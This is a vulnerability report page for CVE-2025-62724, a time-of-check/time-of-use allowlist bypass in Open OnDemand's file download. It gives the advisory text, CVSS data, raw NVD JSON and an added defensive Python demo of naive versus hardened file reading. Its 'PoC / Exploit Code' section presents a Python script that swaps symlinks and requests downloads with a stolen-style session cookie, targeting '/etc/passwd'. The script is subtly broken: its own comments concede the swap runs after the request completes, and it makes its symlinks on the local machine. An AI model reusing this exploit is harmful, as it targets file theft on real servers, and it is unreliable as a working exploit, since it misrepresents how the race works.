Security Vulnerability Report
CVE-2025-62724 CVSS 4.3 MEDIUM

CVE-2025-62724

Published: 2025-11-20 17:15:51
Last Modified: 2026-04-15 00:35:42

Description

Open OnDemand is an open-source HPC portal. Prior to versions 4.0.8 and 3.1.16, users can craft a "Time of Check to Time of Use" (TOCTOU) attack when downloading zip files to access files outside of the OOD_ALLOWLIST. This vulnerability impacts sites that use the file browser allowlists in all current versions of OOD. However, files accessed are still protected by the UNIX permissions. Open OnDemand versions 4.0.8 and 3.1.16 have been patched for this vulnerability.
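The advisory describes a check-then-use gap: a path is validated against the allowlist, and the file read later for the zip is opened by name again, so a symlink retargeted in between delivers a different file. The Python below is an added illustration of that pattern and of one way to close it; it is not code from Open OnDemand or from the GHSA advisory, and the single allowlist root, the helper names and the sample files are assumptions made for the example. The naive reader validates by name and then opens by the same name; the hardened reader opens the already-resolved path component by component with O_NOFOLLOW relative to a descriptor of the root, so the file it reads is the file it checked.

```python
import os
import stat
import tempfile

# Assumption for this example: one allowlisted root directory stands in for
# the OOD_ALLOWLIST entries; "user_path" is the name the browser was given.


def resolve_in_root(user_path, root):
    """Return the symlink-free path relative to root, or None if it escapes."""
    real = os.path.realpath(user_path)
    root = os.path.realpath(root)
    if real == root or real.startswith(root + os.sep):
        return os.path.relpath(real, root)
    return None


def naive_read(user_path, root, race=None):
    """Check-then-use: validate the name, then open the same name later."""
    if resolve_in_root(user_path, root) is None:
        raise PermissionError("outside allowlist")
    if race:
        race()  # simulates the attacker winning the race window
    with open(user_path, "rb") as f:  # follows whatever the name points to now
        return f.read()


def hardened_read(user_path, root, race=None):
    """Open the resolved path from a root descriptor, never following symlinks."""
    rel = resolve_in_root(user_path, root)
    if rel is None:
        raise PermissionError("outside allowlist")
    if race:
        race()  # same race window, but the name is no longer trusted
    fd = os.open(os.path.realpath(root), os.O_RDONLY | os.O_DIRECTORY)
    try:
        parts = rel.split(os.sep)
        for part in parts[:-1]:
            # O_NOFOLLOW on every component: a swapped-in symlink raises ELOOP
            nfd = os.open(part, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=fd)
            os.close(fd)
            fd = nfd
        nfd = os.open(parts[-1], os.O_RDONLY | os.O_NOFOLLOW, dir_fd=fd)
        os.close(fd)
        fd = nfd
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError("not a regular file")
        chunks = []
        while True:
            chunk = os.read(fd, 65536)  # read from the checked descriptor
            if not chunk:
                return b"".join(chunks)
            chunks.append(chunk)
    except PermissionError:
        raise
    except OSError as e:
        raise PermissionError(f"refusing {user_path}: {e.strerror}") from e
    finally:
        os.close(fd)


def demo():
    """Constructed scenario: an allowed file, a secret outside, and a symlink swap."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "allowed")
        os.mkdir(root)
        inside = os.path.join(root, "data.txt")
        outside = os.path.join(tmp, "secret.txt")
        with open(inside, "wb") as f:
            f.write(b"inside")
        with open(outside, "wb") as f:
            f.write(b"outside")
        link = os.path.join(root, "report.txt")
        os.symlink(inside, link)  # passes the allowlist check at check time

        def swap_link():
            os.remove(link)
            os.symlink(outside, link)

        def swap_file():
            os.remove(inside)
            os.symlink(outside, inside)

        results = {"naive": naive_read(link, root, race=swap_link)}
        os.remove(link)
        os.symlink(inside, link)
        results["hardened"] = hardened_read(link, root, race=swap_link)
        try:
            hardened_read(inside, root, race=swap_file)
            results["hardened_swap_file"] = "read"
        except PermissionError:
            results["hardened_swap_file"] = "refused"
        return results


if __name__ == "__main__":
    print(demo())
```

In the demo the naive reader returns the outside file, the hardened reader returns the file that was actually checked, and when the regular file itself is replaced by a symlink the hardened reader refuses with ELOOP. The per-component O_NOFOLLOW walk does not stop a directory being renamed into place within the same filesystem; on Linux 5.6 and later, openat2 with RESOLVE_BENEATH is the stronger primitive, and the same open-then-verify discipline has to be applied at the point where each file is added to the zip.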

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)


Open OnDemand < 4.0.8
Open OnDemand < 3.1.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import io
import os
import zipfile

import requests

# CVE-2025-62724 PoC - Open OnDemand TOCTOU Vulnerability
# Target: Open OnDemand < 4.0.8 or < 3.1.16


class TOCTOUExploit:
    def __init__(self, target_url, session_cookie):
        self.target_url = target_url.rstrip('/')
        self.session_cookie = session_cookie
        self.session = requests.Session()

    def download_file(self, file_path):
        """Download file through file browser"""
        url = f"{self.target_url}/files/download{file_path}"
        headers = {'Cookie': f'ood_session={self.session_cookie}'}
        response = self.session.get(url, headers=headers)
        return response.content

    def exploit_toctou(self, allowed_file, target_file):
        """
        TOCTOU attack:
        1. Request allowed file
        2. Replace symlink during check window
        3. Retrieve target file content
        """
        # Step 1: Create symlink to allowed file
        allowed_link = f"{allowed_file}_link"
        os.symlink(allowed_file, allowed_link)

        # Step 2: Trigger download request
        # Race condition window starts here
        # Note: requests.get blocks until the response is complete, so the
        # swap below runs after the download has finished, not inside the
        # check/use window.
        response = self.session.get(
            f"{self.target_url}/files/download{allowed_link}",
            headers={'Cookie': f'ood_session={self.session_cookie}'}
        )

        # Step 3: During race window, replace symlink
        # attacker replaces allowed_link -> target_file
        os.remove(allowed_link)
        os.symlink(target_file, allowed_link)

        # Step 4: Extract downloaded content
        if response.status_code == 200:
            try:
                # ZipFile needs a file-like object, not raw bytes
                with zipfile.ZipFile(io.BytesIO(response.content)) as zf:
                    # Files outside allowlist may be extracted
                    return zf.namelist()
            except zipfile.BadZipFile:
                return response.content
        return None


# Usage example
# exploit = TOCTOUExploit('https://ondemand.example.com', 'your_session_cookie')
# content = exploit.exploit_toctou('/public/allowed.txt', '/etc/passwd')

print('[+] CVE-2025-62724 PoC for Open OnDemand TOCTOU vulnerability')
print('[+] Target versions: Open OnDemand < 4.0.8 and < 3.1.16')
print('[+] Requires: Low-privilege user account, file browser access')
print('[+] Impact: Arbitrary file read via allowlist bypass')

References

https://github.com/OSC/ondemand/security/advisories/GHSA-vjpg-34px-gjrw

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62724", "sourceIdentifier": "[email protected]", "published": "2025-11-20T17:15:51.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open OnDemand is an open-source HPC portal. Prior to versions 4.0.8 and 3.1.16, users can craft a \"Time of Check to Time of Use\" (TOCTOU) attack when downloading zip files to access files outside of the OOD_ALLOWLIST. This vulnerability impacts sites that use the file browser allowlists in all current versions of OOD. However, files accessed are still protected by the UNIX permissions. Open OnDemand versions 4.0.8 and 3.1.16 have been patched for this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}, {"lang": "en", "value": "CWE-367"}]}], "references": [{"url": "https://github.com/OSC/ondemand/security/advisories/GHSA-vjpg-34px-gjrw", "source": "[email protected]"}]}}